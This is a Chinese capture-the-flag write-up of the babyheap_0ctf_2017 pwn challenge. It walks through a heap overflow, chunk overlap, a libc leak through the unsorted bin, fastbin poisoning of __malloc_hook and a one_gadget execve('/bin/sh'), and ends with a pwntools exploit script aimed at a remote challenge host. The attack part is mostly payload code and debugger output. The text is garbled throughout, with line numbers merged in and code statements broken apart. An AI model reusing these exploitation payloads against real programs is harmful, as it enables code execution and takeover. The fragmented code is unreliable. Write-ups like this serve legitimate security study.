下载好的glibc在lib文件夹中,然后复制ld文件到pwn题目录下,此命令我是在题目终端下执行的,题目文件夹下面应该有这三个文件
然后ldd 对应题目查看glibc和ld
替换libc文件,设置ld文件
patchelf –replace-needed libc.so.6 ./libc-2.23.so ./babyheap_0ctf_2017
patchelf –set-interpreter ./ld-2.23.so ./babyheap_0ctf_2017
—————————对应的ld文件—-pwn文件
然后继续
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 pwndbg> heap
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 pwndbg> heap
两个free的堆块均在fastbins中
填充2号位置,使其指向4号位置 通过漏洞fill堆溢出,修改块2里指向块1的低地址,修改为0x80,即可使得块2指向块4
1 2 3 payload = p64(0 )*3 +p64(0x21 )+p64(0 )*3 +p64(0x21 )0x80 )0 ,len (payload),payload)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 pwndbg> x/50gx 0x557919ada000
1 2 payload +=p64(0 )*3 +p64(0x21 ) 3 ,len (payload),payload)
为绕过检测,修改块4:0x80->0x10,溢出实现
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 pwndbg> heap
重新申请空间,将四号位置分配回来 再申请两块0x21大小的空间,注意,申请第一个时,index=1 为原来的2号chunk;申请第二个时,index=2,为原来的4号chunk;但我们最终想让4号chunk再次free掉,进入unsorted bin中,因此要将4号chunk大小改回0x91,这样也能让top chunk找到。
1、2、4
释放:块1->块2
修改:块2->块4
重新申请:块4->块2(idx1->idx2)
故
原块1直接释放态->allocate态
原块2->idx1
原块4->idx2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 pwndbg> heap
重新修改chunk4:0x10->0x80
为了让top chunk重新找得到,故需要重新将chunk4的大小修改回0x80,以便于之后申请操作
1 2 payload = p64(0 )*3 + p64(0x91 ) 3 ,len (payload),payload)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 pwndbg> heap
申请一个块,防止块4free与top chunk合并
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 pwndbg> heap
free(4) 此时已经存在两个index指向一个chunk。一个是最开始申请的index=4,一个是后边再重新申请的index=2,这时free(4),4号chunk的fd和bk变成了main+arena+88地址,_malloc_hook=main_arena-0x10
1 2 3 4 free(4 ) 2 )'\x7f' )[-6 :].ljust(8 ,b'\0' )) - 88 - 0x10 "__malloc_hook" ] print (hex (libc_base))
打印idx2(即idx4内容)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 pwndbg> heap
1 2 [*] __malloc_hook: 0x7f46cb771b10
切割4号块 将四号块切割,使得一部分块放入fastbin中,这样才便于利用
申请0x60空间
新块的idx为4(把idx4给了分配的块,因为分配的0x21没有idx)
切割0x91的块,剩下0x21放入了unsortedbin中
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 pwndbg> heap
释放0x60的块
再次释放0x60的块,放入了fastbin中,为fastbin后面继续申请0x60的堆地址提供了帮助
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 pwndbg> heap
修改idx2内容,使其为malloc_hook附近构造chunk的地址 修改idx2内容,使其为malloc_hook附近构造chunk的地址,这块地址将来要创建一个虚假的chunk,要求是大小不能超过fastbin,并且包含malloc_hook,因为后面要将malloc_hook修改,使其指向其他函数,执行攻击。一般会将伪造的chunk的size为0x7f,正好在fastbin要求之内,也足够大,计算该地址为malloc_hook
查看malloc_hook的位置
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 pwndbg> x/32gx (long long)(&main_arena)-0x40
1 2 payload = p64(__malloc_hook - 35 ) 2 ,len (payload),payload)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 pwndbg> heap
申请假chunk,并将malloc_hook修改 malloc->gadget 1 2 3 4 5 allo(0x60 )0x60 )b'a' *(0x8 +0x2 +0x8 +1 ) 0x4526a ) 6 ,len (payload),payload)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 pwndbg> heap
再次执行malloc 因为malloc_hook已经被修改到其他地址,我们再次执行malloc,则会执行我们的目标函数,用one_gadget找到目标函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 fanfan@ubuntu:~/pwn challenges/heap$ one_gadget libc-2.23 .so0x45226 execve("/bin/sh" , rsp+0x30 , environ)0x4527a execve("/bin/sh" , rsp+0x30 , environ)0x30 ] == NULL0xf03a4 execve("/bin/sh" , rsp+0x50 , environ)0x50 ] == NULL0xf1247 execve("/bin/sh" , rsp+0x70 , environ)0x70 ] == NULL
exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 from pwn import *from LibcSearcher import *'linux' ,arch='amd64' ,log_level='debug' )'node4.buuoj.cn' ,29856 )'libc-2.23.so' )def debug ():def allo (size ):"Command: " )str (1 ))"Size: " )str (size))def fill (idx,size,content ):"Command: " )str (2 ))"Index: " )str (idx))"Size: " )str (size))"Content: " )def free (idx ):"Command: " )str (3 ))"Index: " )str (idx))def dump (idx ):"Command: " )str (4 ))"Index: " )str (idx))0x10 )0x10 )0x10 )0x10 )0x80 )1 )2 )0 )*3 + p64(0x21 ) + p64(0 )*3 + p64(0x21 )0x80 ) 0 ,len (payload),payload)0 )*3 + p64(0x21 )3 ,len (payload),payload) 0x10 )0x10 )0 )*3 + p64(0x91 )3 ,len (payload),payload) 0x80 ) 4 ) 2 )'\x7f' )[-6 :].ljust(8 ,b'\0' )) - 88 - 0x10 "__malloc_hook" ]"__malloc_hook: " + hex (__malloc_hook))"libc_base: " + hex (libc_base))0x60 )4 ) 35 )2 ,len (payload),payload)0x60 )0x60 ) b'a' *(0x8 +0x2 +0x8 +1 )0x4526a )6 ,len (payload),payload)79 )
